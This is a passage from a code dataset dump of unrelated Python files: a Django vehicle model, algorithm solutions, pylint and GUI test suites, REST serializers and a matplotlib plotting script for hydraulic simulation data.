User.objects.create(email=email)\n profile = Profile.objects.create(user=user, name=username)\n\n return profile\n","sub_path":"eahub/tests/test_profile_models.py","file_name":"test_profile_models.py","file_ext":"py","file_size_in_byte":5646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"13187124","text":"from django.db import models\nfrom dynamicfleet.veiculos.validators import validate_license, validate_year\n\n\nclass Vehicle(models.Model):\n\n STATES_CHOICES = [\n ('disponivel', 'Disponível'),\n ('manutencao', 'Manutenção')\n ]\n\n model = models.CharField('Modelo', max_length=128)\n license_plate = models.CharField('Placa', \n max_length=7, \n unique=True, \n validators=[validate_license])\n year = models.PositiveIntegerField('Ano', \n validators=[validate_year],\n default=2020)\n state = models.CharField('Estado', \n max_length=10, \n choices=STATES_CHOICES, \n default='disponivel')\n\n created = models.DateTimeField('Registrado em', auto_now_add=True)\n modified = 
models.DateTimeField('Modificado em', auto_now=True)\n\n class Meta:\n verbose_name = 'veículo'\n verbose_name_plural = 'veículos'\n\n def __str__(self):\n return '{} - {}'.format(self.model, self.license_plate)\n","sub_path":"dynamicfleet/veiculos/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"384213248","text":"# cook your dish here\r\nt=int(input())\r\nfor i in range(t):\r\n n=int(input())\r\n scores=[0]*11\r\n for j in range(n):\r\n p,s=map(int,input().split())\r\n if s>scores[p-1]:\r\n scores[p-1]=s\r\n print(sum(scores[:8]))","sub_path":"Beginner/That Is My Score!.py","file_name":"That Is My Score!.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"398190566","text":"# -*- coding: utf-8 -*-\n\"\"\"\n# Definition for a Node.\nclass Node(object):\n def __init__(self, val, children):\n self.val = val\n self.children = children\n\"\"\"\n\n\nclass Solution(object):\n def preorder(self, root):\n \"\"\"\n Solution: recursive\n Time: O(n)\n Space: O(n)\n Perf: Runtime: 688 ms, faster than 50.66% / Memory Usage: 107.5 MB, less than 84.36%\n :type root: Node\n :rtype: List[int]\n \"\"\"\n self.res = []\n self.helper(root)\n return self.res\n\n def helper(self, node):\n if node is None:\n return\n self.res.append(node.val)\n if node.children:\n for child in node.children:\n self.helper(child)\n return","sub_path":"Data Structure & Algorithm/Tree/589. N-ary Tree Preorder Traversal/recursive.py","file_name":"recursive.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"496931357","text":"\"\"\"Test main for edx-lint.\"\"\"\n\nimport os\nimport unittest\nimport re\n\ndef load_tests(unused_loader, tests, unused_pattern): # pylint: disable=unused-argument\n \"\"\"Loads tests for the pylint test loader.\n\n This function is automatically run by pylint's test runner, and is called\n with three arguments, two of which we don't need.\n\n \"\"\"\n # Have to import this in the function, because the module does\n # initialization on import! 
ugh.\n from pylint.testutils import LintTestUsingFile, linter, get_tests_info\n\n # Inline functions that was deleted from pylint core\n def cb_test_gen(base_class):\n \"\"\"Inlined from pylint\"\"\"\n def call(input_dir, msg_dir, module_file, messages_file, dependencies):\n \"\"\"Inlined from pylint\"\"\"\n class LintTC(base_class):\n \"\"\"Inlined from pylint\"\"\"\n module = module_file.replace('.py', '')\n output = messages_file\n depends = dependencies or None\n INPUT_DIR = input_dir\n MSG_DIR = msg_dir\n return LintTC\n return call\n\n def make_tests(input_dir, msg_dir, filter_rgx, callbacks):\n \"\"\"generate tests classes from test info\n\n return the list of generated test classes\n \"\"\"\n if filter_rgx:\n is_to_run = re.compile(filter_rgx).search\n else:\n is_to_run = lambda x: 1\n tests = []\n for module_file, messages_file in (\n get_tests_info(input_dir, msg_dir, 'func_', '')\n ):\n if not is_to_run(module_file) or module_file.endswith(('.pyc', \"$py.class\")):\n continue\n base = module_file.replace('func_', '').replace('.py', '')\n\n dependencies = get_tests_info(input_dir, msg_dir, base, '.py')\n\n for callback in callbacks:\n test = callback(input_dir, msg_dir, module_file, messages_file,\n dependencies)\n if test:\n tests.append(test)\n return tests\n\n\n # Load our plugin.\n linter.load_plugin_modules(['edx_lint.pylint'])\n\n here = os.path.dirname(os.path.abspath(__file__))\n\n tests = make_tests(\n input_dir=os.path.join(here, 'input'),\n msg_dir=os.path.join(here, 'messages'),\n filter_rgx=None,\n callbacks=[cb_test_gen(LintTestUsingFile)],\n )\n\n cls = unittest.TestSuite\n return cls(unittest.makeSuite(test, suiteClass=cls) for test in tests)\n","sub_path":"test/test_pylint_plugins.py","file_name":"test_pylint_plugins.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"437199920","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 27 17:42:22 2013\n\n@author: Wojtek\n\"\"\"\nfrom numpy import loadtxt\nimport os\n\nimport matplotlib.pyplot as plt\n# from matplotlib.font_manager import FontProperities\n\nfig = plt.figure(figsize=(20, 16))\n# figure(1, figsize=(6, 4.5))\n\nt, x1, x2 = loadtxt('x.dat', unpack=True)\nplotX = fig.add_subplot(3, 2, 1)\n# figure(1, figsize=(6, 4.5))\n# plotX.set_xlabel('t[m]')\nplotX.set_ylabel(r'$x_s$[m]')\nplotX.grid(True)\nplotX.hold(True)\nplotX.lw = 1\nplotX.plot(t, x1, 'r', linewidth=plotX.lw)\nplotX1 = plotX.twinx()\nplotX1.plot(t, x2, 'g', linewidth=plotX.lw)\nplotX1.set_ylabel(r'$x_t$[m]')\nplotX.legend((r'$x_s$', r'$x_t$'), loc=2)\nplotX1.legend((r'$x_t$',), loc=4)\nplotX.set_title(u'Przemieszczenie suwaka i tloczyska')\n# fig.savefig('x.png', dpi=150)\nprint(\".\")\n\nt, y1, y2 = loadtxt('y.dat', unpack=True)\n# figure(1, figsize=(6, 4.5))\nplotY = fig.add_subplot(3, 2, 2)\n# plotY.set_xlabel('t[s]')\nplotY.set_ylabel('v[m/s]')\nplotY.grid(True)\nplotY.hold(True)\nplotY.lw = 1\nplotY.plot(t, y1, 'r', linewidth=plotY.lw)\nplotY.plot(t, y2, 'g', linewidth=plotY.lw)\nplotY.legend((r'$v_s$', r'$v_t$'))\nplotY.set_title(u'Predkosc suwaka i tloczyska')\n# savefig('y.png', dpi=150)\nprint(\".\" * 2)\n\nt, p1, p2, p3 = loadtxt('p.dat', unpack=True)\n# figure(1, figsize=(6, 4.5))\nplotP = fig.add_subplot(3, 2, 3)\n# plotP.set_xlabel('t[s]')\nplotP.set_ylabel('p[Pa]')\nplotP.grid(True)\nplotP.hold(True)\nplotP.lw = 1\nplotP.plot(t, p1, 'r', linewidth=plotP.lw)\nplotP.plot(t, p2, 'g', linewidth=plotP.lw)\nplotP.plot(t, p3, 'b', 
linewidth=plotP.lw)\nplotP.legend((r'$p_1$', r'$p_2$', r'$p_3$'))\nplotP.set_title(u'Cisnienia')\n# savefig('p.png', dpi=150)\nprint(\".\" * 3)\n\nt, Fhs, Fts, Fss, Fds, Fht, Ftt, El1, El2 = loadtxt('FList.dat', unpack=True)\n# figure(1, figsize=(6, 4.5))\nplotF = fig.add_subplot(3, 2, 4)\nplotF.set_xlabel('t[s]')\nplotF.set_ylabel('F[N]')\nplotF.grid(True)\nplotF.hold(True)\nplotF.lw = 1\nplotF.plot(t, Fhs, 'r', linewidth=plotF.lw)\nplotF.plot(t, Fts, 'g', linewidth=plotF.lw)\nplotF.plot(t, Fss, 'b', linewidth=plotF.lw)\nplotF.plot(t, Fds, 'c', linewidth=plotF.lw)\nplotF.plot(t, Fht, 'm', linewidth=plotF.lw)\nplotF.plot(t, Ftt, 'y', linewidth=plotF.lw)\nplotF.legend((r'$F_{hs}$', r'$F_{ts}$', r'$F_{ss}$', r'$F_{ds}$', r'$F_{ht}$', r'$F_{tt}$',))\nplotF.set_title(u'F')\nprint(\".\" * 4)\n\nt, Q1, Q2, Q3, Q4, Q5, Qp, Qz1, Sroz = loadtxt('QList.dat', unpack=True)\n# figure(1, figsize=(6, 4.5))\nplotQ = fig.add_subplot(3, 2, 5)\nplotQ.set_xlabel('t[s]')\nplotQ.set_ylabel('Q[m3/s]')\nplotQ.grid(True)\nplotQ.hold(True)\nplotQ.lw = 1\nplotQ.plot(t, Q1, 'r', linewidth=plotQ.lw)\nplotQ.plot(t, Q2, 'g', linewidth=plotQ.lw)\nplotQ.plot(t, Q3, 'b', linewidth=plotQ.lw)\nplotQ.plot(t, Q4, 'c', linewidth=plotQ.lw)\nplotQ.plot(t, Q5, 'm', linewidth=plotQ.lw)\nplotQ.plot(t, Qp, 'y', linewidth=plotQ.lw)\nplotQ.plot(t, Qz1, 'k', linewidth=plotQ.lw)\nplotQ.legend((r'$Q_1$', r'$Q_2$', r'$Q_3$', r'$Q_4$', r'$Q_5$', r'$Q_p$', r'$Q_{z1}$'), loc=4)\nplotQ.set_title(u'Q')\n\nplotTmp = fig.add_subplot(3, 2, 6)\nplotTmp.set_xlabel('t[s]')\nplotTmp.set_ylabel('El')\nplotTmp.grid(True)\nplotTmp.hold(True)\nplotTmp.lw = 1\n# plotTmp.plot(t, El1, 'r', linewidth=plotTmp.lw)\n# plotTmp.plot(t, El2, 'g', linewidth=plotTmp.lw)\nplotTmp.plot(t, Sroz, 'b', linewidth=plotTmp.lw)\nplotTmp.legend((\n # r'$El_1$',\n # r'$El_2$',\n r'$Sroz$',))\nplotTmp.set_title(u'El')\n# savefig('tmp.png', dpi=150)\nfig.savefig('x.png', dpi=300)\nprint(\".\" * 5)\nprint(\"Done!\")\nos.system(\"start \" + 'x.png')\n","sub_path":"doc/chart.py","file_name":"chart.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"578742394","text":"\"\"\"\n This file contains the main program to read data, run classifiers and print results.\n Please DO NOT modify any functions in this file other than the main function.\n\n To run the main.py file from command line, simply navigate to the directory where main.py resides, and type:\n python main.py PATH_TO_DATASET\n\n The two datasets are available in the /course/cs1420/data/hw3 folder, named digits.csv and fishiris.csv.\n Copy these two files to your hw3 folder, PATH_TO_DATASET should be the relative path to the csv files.\n\n\"\"\"\nimport sys\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nfrom collections import namedtuple\nimport random\nfrom sklearn.model_selection import train_test_split\n\nfrom models import KmeansClassifier, KNeighborsClassifier, DecisionTree\n\n\ndef plot_KNN(data, N_NEIGHBORS=6, h=0.02):\n \"\"\"\n This is a helper function that trains the Iris data to a KNN classifier and produce a 2D plot of the\n classification graph showing decision boundaries.\n\n The x and y axis of the graph is the first two features of inputs in order to produce a 2D plot.\n In the iris dataset, \"Sepal length\" and \"Sepal width\" are the first two features.\n\n The other features are discarded in both training and prediction.\n\n :param data: a 
namedtuple including inputs and labels, used in both training and ploting\n :param N_NEIGHBORS: number of neighbors to use for knn classifier\n :param h: step size of x and y axis in meshgrid\n :return: None\n \"\"\"\n # Check if data has at least two features\n if len(data.inputs[0]) < 2:\n print(\"Number of features is less than 2!\")\n return\n # Check if NUM_NEIGHBORS is a positive integer\n if isinstance(N_NEIGHBORS, int) == False:\n print(\"Invalid input! Number of neighbors must be an integer!\")\n return\n elif N_NEIGHBORS <= 0:\n print(\"Invalid input! Number of neighbors must be greater than zero!\")\n return\n\n # Create color maps\n cmap_light = ListedColormap(['#FFAAAA', '#AAFFAA', '#00AAFF']) # used to show decision boundaries\n cmap_bold = ListedColormap(['#FF0000', '#00FF00', '#00AAFF']) # used to mark true labels of data points\n\n X = data.inputs[:, :2]\n y = data.labels\n\n # calculate min, max and limits\n x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n\n model = KNeighborsClassifier(N_NEIGHBORS)\n model.train(X, y)\n Z = model.predict(np.c_[xx.ravel(), yy.ravel()])\n\n # Put the result into a color plot\n Z = Z.reshape(xx.shape)\n plt.figure()\n plt.pcolormesh(xx, yy, Z, cmap=cmap_light)\n\n # Plot also the training points\n plt.scatter(X[:, 0], X[:, 1], c=y, cmap=cmap_bold)\n plt.xlabel('Sepal length')\n plt.ylabel('Sepal width')\n plt.xlim(xx.min(), xx.max())\n plt.ylim(yy.min(), yy.max())\n plt.title(str(model.n_labels_) + \"-Class classification (k = %i) on Iris data\" % (N_NEIGHBORS))\n plt.show()\n\ndef plot_Kmeans(data, NUM_CLUSTERS = 3):\n \"\"\"\n This is a helper function that trains 8 x 8 handwritten digits data to a K-means classifier\n and visualize k cluster centers for each digit class (0 ~ 9).\n\n Note: this function is designed only for digits.csv data set.\n\n :param data: a namedtuple including inputs and labels, used to train the K-means classifier\n :param NUM_CLUSTERS: number of clusters used in K-Means classifier\n :return: None\n \"\"\"\n # Check if input data is valid\n if len(data.inputs[0]) != 64:\n print(\"Invalid input! Input data must be 8 x 8 hand-written digits!\")\n return\n # Check if NUM_CLUSTERS is a positive integer\n if isinstance(NUM_CLUSTERS, int) == False:\n print(\"Invalid input! Number of clusters must be an integer!\")\n return\n elif NUM_CLUSTERS <= 0:\n print(\"Invalid input! 
Number of clusters must be greater than zero!\")\n return\n\n # Run K-means Classifier\n model = KmeansClassifier(NUM_CLUSTERS)\n model.train(data.inputs, data.labels)\n cluster_centers = model.cluster_centers_\n\n fig, ax = plt.subplots(NUM_CLUSTERS, len(cluster_centers.keys()), figsize=(8, 3))\n unflattened_centers = np.array(list(cluster_centers.values())).reshape(len(cluster_centers.keys()), NUM_CLUSTERS, 8,\n 8)\n for i in range(len(ax[0])):\n for j in range(len(ax)):\n axi = ax[j][i]\n center = unflattened_centers[i, j, :, :]\n axi.set(xticks=[], yticks=[])\n axi.imshow(center, interpolation='nearest', cmap=plt.cm.binary)\n plt.show()\n\n\ndef test_KNN(train_data, test_data, N_NEIGHBORS = 6):\n \"\"\"\n Create a K-Nearest Neighbor classifier, train it with train_data and print the accuracy of model on test_data\n\n :param train_data: a namedtuple including training inputs and training labels\n :param test_data: a namedtuple including test inputs and test labels\n :param N_NEIGHBORS: number of neighbors used in KNN classifier\n :return: None\n \"\"\"\n # Check if NUM_NEIGHBORS is a positive integer\n if isinstance(N_NEIGHBORS, int) == False:\n print(\"Invalid input! Number of neighbors must be an integer!\")\n return\n elif N_NEIGHBORS <= 0:\n print(\"Invalid input! Number of neighbors must be greater than zero!\")\n return\n\n # Run K Nearest Neighbors Classifier\n model = KNeighborsClassifier(N_NEIGHBORS)\n model.train(train_data.inputs, train_data.labels)\n accuracy = model.accuracy(test_data)\n print(\"Testing on K Nearest Neighbor Classifier (K = \" + str(N_NEIGHBORS) + \"), the accuracy is {:.2f}%\".format(accuracy * 100))\n\ndef test_Kmeans(train_data, test_data, NUM_CLUSTERS = 3):\n \"\"\"\n Create a K-Means classifier, train it with train_data and print the accuracy of model on test_data\n\n :param train_data: a namedtuple including training inputs and training labels\n :param test_data: a namedtuple including test inputs and test labels\n :param NUM_CLUSTERS: number of clusters used in K-Means classifier\n :return: None\n \"\"\"\n # Check if NUM_CLUSTERS is a positive integer\n if isinstance(NUM_CLUSTERS, int) == False:\n print(\"Invalid input! Number of clusters must be an integer!\")\n return\n elif NUM_CLUSTERS <= 0:\n print(\"Invalid input! Number of clusters must be greater than zero!\")\n return\n\n # Run K-means Classifier\n model = KmeansClassifier(NUM_CLUSTERS)\n model.train(train_data.inputs, train_data.labels)\n accuracy = model.accuracy(test_data)\n print(\"Testing on K-Means Classifier (K = \" + str(NUM_CLUSTERS) + \"), the accuracy is {:.2f}%\".format(accuracy * 100))\n\n\ndef test_Dtree(data):\n \"\"\"\n Create a Decision Tree classifier, using part of the data constructing the tree\n\n :param data: a panda DataFrame object\n :return: None\n \"\"\"\n # In order to construct the tree, the data will be parsed to a form of 2-d array,\n # with data[:,0] as the label, and data[:,1:] as the values for each feature\n data = data.values.tolist()\n random.shuffle(data)\n ratio = 0.66\n num_train = int(np.ceil(len(data) * ratio))\n train_data = data[:num_train]\n test_data = data[num_train:]\n\n # Construct the decision tree\n decision_tree = DecisionTree(train_data, gain_function='entropy')\n\n # Uncomment the next line if you would like to see your tree printed. 
Please\n # note that printing works best on shallow trees.\n # decision_tree.print_tree()\n print(\"\\nExploring dataset with entropy...\")\n print(\"Training size: \",len(train_data) )\n print(\"Test size: \",len(test_data) )\n print(\"Training data accuracy\", decision_tree.accuracy(train_data))\n print(\"Test data accuracy\", decision_tree.accuracy(test_data))\n\n decision_tree = DecisionTree(train_data, gain_function='gini_index')\n print(\"\\nExploring dataset with gini index...\")\n print(\"Training size: \",len(train_data) )\n print(\"Test size: \",len(test_data) )\n print(\"Training data accuracy\", decision_tree.accuracy(train_data))\n print(\"Test data accuracy\", decision_tree.accuracy(test_data))\n\ndef main():\n\n random.seed(0)\n np.random.seed(0)\n if len(sys.argv) != 2:\n print('Incorrect number of arguments. Usage: python main.py PATH_TO_DATASET')\n exit()\n\n script, filename = sys.argv\n\n Dataset = namedtuple('Dataset', ['inputs', 'labels'])\n\n # Read data\n data = pd.read_csv(filename, header = 0)\n\n # We assume labels are in the first column of the dataset\n labels = data.values[:, 0]\n\n # If labels are of type string, convert class names to numeric values\n if isinstance(labels[0], str):\n classes = np.unique(labels)\n class_mapping = dict(zip(classes, range(0, len(classes))))\n labels = np.vectorize(class_mapping.get)(labels)\n\n # Features columns are indexed from 1 to the end, make sure that dtype = float32\n inputs = data.values[:, 1:].astype(\"float32\")\n\n # Split data into training set and test set with a ratio of 2:1\n train_inputs, test_inputs, train_labels, test_labels = train_test_split(inputs, labels, test_size = 0.33)\n\n all_data = Dataset(inputs, labels)\n train_data = Dataset(train_inputs, train_labels)\n test_data = Dataset(test_inputs, test_labels)\n print(\"Shape of training data inputs: \", train_data.inputs.shape)\n print(\"Shape of test data inputs:\", test_data.inputs.shape)\n\n # DO NOT MODIFY ABOVE THIS LINE!\n # TODO: call test_KNN(), test_Kmeans() and test_Dtree() to test your implementation\n # TODO: try out plot_KNN() on the iris data and plot_Kmeans() on the digits data\n\n test_KNN(train_data,test_data,N_NEIGHBORS = 3)\n test_KNN(train_data,test_data,N_NEIGHBORS = 4)\n test_KNN(train_data,test_data,N_NEIGHBORS = 5)\n test_KNN(train_data,test_data,N_NEIGHBORS = 6)\n test_KNN(train_data,test_data,N_NEIGHBORS = 8)\n test_KNN(train_data,test_data,N_NEIGHBORS = 10)\n test_Kmeans(train_data,test_data,NUM_CLUSTERS = 2)\n test_Kmeans(train_data,test_data,NUM_CLUSTERS = 3)\n test_Kmeans(train_data,test_data,NUM_CLUSTERS = 4)\n test_Kmeans(train_data,test_data,NUM_CLUSTERS = 5)\n #test_Dtree(data)\n\n plot_KNN(train_data)\n #plot_Kmeans(train_data)\n\nif __name__ == '__main__':\n main()\n","sub_path":"k-means/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"448226869","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport unittest\n\nimport numpy as np\n\nfrom glassure.gui.controller.glassure import GlassureController\nfrom glassure.tests.gui_tests.utility import set_widget_text, click_checkbox, click_button, QtTest, prepare_file_loading\n\n\n\nclass GlassureFunctionalTest(unittest.TestCase):\n def setUp(self):\n self.controller = GlassureController()\n self.widget = self.controller.main_widget\n self.model = self.controller.model\n\n def test_normal_workflow(self):\n # Edd opens the program and wants to load his data and background 
file:\n\n prepare_file_loading('Mg2SiO4_ambient.xy')\n self.controller.load_data()\n prepare_file_loading('Mg2SiO4_ambient_bkg.xy')\n self.controller.load_bkg()\n\n # he gives the composition of the sample and the normalization procedure is automatically done and he sees\n # a computed g(r) and s(q)\n\n prev_sq_data = self.widget.pattern_widget.sq_items[0].getData()\n prev_gr_data = self.widget.pattern_widget.gr_items[0].getData()\n\n self.widget.left_control_widget.composition_widget.add_element('Mg', 2)\n self.widget.left_control_widget.composition_widget.add_element('Si', 1)\n self.widget.left_control_widget.composition_widget.add_element('O', 4)\n\n self.assertEqual(self.model.composition, {'Mg': 2, 'Si': 1, 'O': 4})\n\n self.assertFalse(np.array_equal(prev_sq_data, self.widget.pattern_widget.sq_items[0].getData()))\n self.assertFalse(np.array_equal(prev_gr_data, self.widget.pattern_widget.gr_items[0].getData()))\n\n # Now he wants to enter the correct density value:\n prev_gr_data = self.widget.pattern_widget.gr_items[0].getData()\n set_widget_text(self.widget.density_txt, 2.9)\n self.assertFalse(np.array_equal(prev_gr_data, self.widget.pattern_widget.gr_items[0].getData()))\n\n # Then he he adjusts the scale of the background data and it automatically adjusts sq and gr\n prev_sq_data = self.widget.pattern_widget.sq_items[0].getData()\n prev_gr_data = self.widget.pattern_widget.gr_items[0].getData()\n\n self.widget.bkg_scaling_sb.setValue(0.5)\n\n self.assertFalse(np.array_equal(prev_sq_data, self.widget.pattern_widget.sq_items[0].getData()))\n self.assertFalse(np.array_equal(prev_gr_data, self.widget.pattern_widget.gr_items[0].getData()))\n\n # now he adjusts the smoothing and sees the things change in respect to\n prev_sq_data = self.widget.pattern_widget.sq_items[0].getData()\n prev_gr_data = self.widget.pattern_widget.gr_items[0].getData()\n\n self.widget.smooth_sb.setValue(3)\n\n self.assertFalse(np.array_equal(prev_sq_data, self.widget.pattern_widget.sq_items[0].getData()))\n self.assertFalse(np.array_equal(prev_gr_data, self.widget.pattern_widget.gr_items[0].getData()))\n\n # now he wants to see how the data looks when choosing a larger Q-range\n prev_sq_data = self.widget.pattern_widget.sq_items[0].getData()\n prev_gr_data = self.widget.pattern_widget.gr_items[0].getData()\n\n set_widget_text(self.widget.q_max_txt, 12)\n\n self.assertFalse(np.array_equal(prev_sq_data, self.widget.pattern_widget.sq_items[0].getData()))\n self.assertFalse(np.array_equal(prev_gr_data, self.widget.pattern_widget.gr_items[0].getData()))\n\n # he thinks there are still strong oscillations at the lower r-region, and wants to see what the Loch\n # modification function will do\n\n prev_sq_data = self.widget.pattern_widget.sq_items[0].getData()\n prev_gr_data = self.widget.pattern_widget.gr_items[0].getData()\n\n click_checkbox(self.widget.use_modification_cb)\n\n self.assertTrue(np.array_equal(prev_sq_data, self.widget.pattern_widget.sq_items[0].getData()))\n self.assertFalse(np.array_equal(prev_gr_data, self.widget.pattern_widget.gr_items[0].getData()))\n\n # the data unfortunately is not measured up to a Q of 0 A^-1, however the missing data below 1 A^-1 is already\n # extrapolated with a step function, he thinks the polynomial option might be a better choice, selects it and\n # sees the change:\n\n self.assertLess(self.widget.pattern_widget.sq_items[0].getData()[0][0], 0.5)\n\n prev_sq_data = self.widget.pattern_widget.sq_items[0].getData()\n 
click_checkbox(self.widget.left_control_widget.extrapolation_widget.poly_extrapolation_rb)\n self.assertFalse(np.array_equal(prev_sq_data, self.widget.pattern_widget.sq_items[0].getData()))\n\n # changing the q_max value gives an even better result for the polynomial extrapolation\n\n prev_sq_data = self.widget.pattern_widget.sq_items[0].getData()\n set_widget_text(self.widget.extrapolation_q_max_txt, 1.5)\n self.assertFalse(np.array_equal(prev_sq_data, self.widget.pattern_widget.sq_items[0].getData()))\n\n # looks good already! However, the oscillations below 1 Angstrom bother him still a lot, so he wants to\n # optimize this by using the Eggert et al. (2002) method:\n\n prev_sq_data = self.widget.pattern_widget.sq_items[0].getData()\n click_checkbox(self.widget.optimize_activate_cb)\n self.assertFalse(np.array_equal(prev_sq_data, self.widget.pattern_widget.sq_items[0].getData()))\n\n # However, he realizes that the default cutoff might be too low for this kind of data, so he gives a larger number\n # and optimizes again:\n\n prev_sq_data = self.widget.pattern_widget.sq_items[0].getData()\n set_widget_text(self.widget.optimize_r_cutoff_txt, 1.2)\n self.assertFalse(np.array_equal(prev_sq_data, self.widget.pattern_widget.sq_items[0].getData()))\n\n def test_working_with_configurations(self):\n # Edd starts to make some analysis\n prepare_file_loading('Mg2SiO4_ambient.xy')\n self.controller.load_data()\n prepare_file_loading('Mg2SiO4_ambient_bkg.xy')\n self.controller.load_bkg()\n\n self.widget.left_control_widget.composition_widget.add_element('Si', 1)\n\n # He likes the default parameters, but wants to test it against another density, therefore he saves the current\n # state\n\n click_button(self.widget.freeze_configuration_btn)\n\n # and magically sees that there is now a field in the configuration table and extra other lines in the plot\n # widgets\n\n self.assertEqual(self.widget.configuration_tw.rowCount(), 2)\n","sub_path":"glassure/tests/gui_tests/test_functional.py","file_name":"test_functional.py","file_ext":"py","file_size_in_byte":6449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"358523417","text":"from rest_framework.serializers import (\n ModelSerializer,\n HyperlinkedIdentityField,\n SerializerMethodField,\n)\n\nfrom posts.models import Post\n\nclass PostListSerializer(ModelSerializer):\n url = HyperlinkedIdentityField(\n view_name='posts-api:detail',\n lookup_field='slug'\n )\n user = SerializerMethodField()\n class Meta:\n model=Post\n fields=[\n 'url',\n 'user',\n 'title',\n 'slug',\n 'content',\n 'id',\n 'publish',\n ]\n def get_user(self, obj):\n return str(obj.user.username)\n\nclass PostDetailSerializer(ModelSerializer):\n class Meta:\n model=Post\n fields=[\n 'title',\n 'slug',\n 'content',\n 'id',\n 'publish',\n ]\n\nclass PostCreateUpdateSerializer(ModelSerializer):\n class Meta:\n model=Post\n fields=[\n 'title',\n # 'slug',\n 'content',\n # 'id',\n 'publish',\n ]\n","sub_path":"src/posts/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"623249633","text":"from unittest.mock import Mock\n\nimport click\nimport pytest\n\nfrom coworks.cws.command import CwsCommand, CwsCommandError\nfrom tests.coworks.tech_ms import *\n\ncmd_mock = Mock()\n\n\nclass MyCommand(CwsCommand):\n def multi_execute(cls, project_dir, workspace, execution_list):\n cmd_mock()\n for command, options 
in execution_list:\n assert project_dir == 'tests/cws'\n assert options['module'] == 'test_cmd'\n assert options['workspace'] == 'dev'\n assert options['service'] == 'test'\n\n\nclass MyCommandWithOptions(MyCommand):\n\n @property\n def options(self):\n return [\n *super().options,\n click.option('--param', required=True),\n click.option('--other', required=True),\n click.option('--nothing'),\n ]\n\n\nclass TestCommand:\n\n def test_command(self):\n simple = SimpleMS()\n MyCommand(simple, name='test')\n\n with pytest.raises(CwsCommandError) as pytest_wrapped_e:\n simple.execute('autre', project_dir='tests/cws', module='test_cmd', workspace='dev')\n assert pytest_wrapped_e.type == CwsCommandError\n assert pytest_wrapped_e.value.msg == 'The command autre was not added to the microservice test.\\n'\n\n simple.execute('test', project_dir='tests/cws', module='test_cmd', workspace='dev')\n cmd_mock.assert_called_once()\n\n simple.execute('test', project_dir='tests/cws', module='test_cmd', workspace='dev', help=None)\n\n def test_command_with_options(self):\n simple = SimpleMS()\n MyCommandWithOptions(simple, name='test_command_with_options')\n\n with pytest.raises(CwsCommandError) as pytest_wrapped_e:\n simple.execute('test_command_with_options', project_dir='tests/cws', module='test_cmd', workspace='dev')\n assert pytest_wrapped_e.type == CwsCommandError\n assert pytest_wrapped_e.value.msg == 'missing parameter: param'\n\n simple.execute('test_command_with_options', project_dir='tests/cws', module='test_cmd', workspace='dev',\n param='param', other='other')\n","sub_path":"tests/cws/test_cmd.py","file_name":"test_cmd.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"83457815","text":"# -*- coding: utf-8 -*-\n\nimport json, requests\n\nfrom silo_user.user.db import User\nfrom util_test.base import get_url, create_test_user, login_test_user\nfrom util_test.database import flush_database\n\n\n# def test_create():\n#\n# flush_database()\n#\n# result = create_test_user()\n#\n# assert result['success'] is True\n#\n#\n# def test_login():\n#\n#\n# s = requests.Session()\n#\n# result = json.loads(s.post(\n#\n# url = get_url('ApiHelios.User.Login'),\n#\n# data = {\n#\n# 'email': 'test@example.com',\n# 'password': '12345678'\n# }\n#\n# ).text)\n#\n# assert result['success'] is True\n#\n#\n# def test_update_pass():\n#\n# s, viewer_hid = login_test_user()\n#\n# result = json.loads(s.post(\n#\n# url = get_url('ApiHelios.User.UpdatePass'),\n#\n# data = {\n#\n# 'target_hid': viewer_hid,\n# 'old_password': '12345678',\n# 'new_password': '87654321'\n# }\n#\n# ).text)\n#\n# assert result['success'] is True\n#\n# # Reset the password to the default value so that further unit tests work\n#\n# result = json.loads(s.post(\n#\n# url = get_url('ApiHelios.User.UpdatePass'),\n#\n# data = {\n#\n# 'target_hid': viewer_hid,\n# 'old_password': '87654321',\n# 'new_password': '12345678'\n# }\n#\n# ).text)\n#\n# assert result['success'] is True\n#\n#\n# def test_update_profile():\n#\n# s, viewer_hid = login_test_user()\n#\n# new_first_name = 'NewName'\n# new_tagline = 'New Tagline'\n# new_bio = 'New Bio'\n#\n# result = json.loads(s.post(\n#\n# url = get_url('ApiHelios.User.UpdateProfile'),\n#\n# data = {\n#\n# 'target_hid': viewer_hid,\n# 'first_name': new_first_name,\n# 'tagline': new_tagline,\n# 'bio': new_bio\n# }\n#\n# ).text)\n#\n# assert result['success'] is True\n#\n# # Verify all of the row's columns have been correctly 
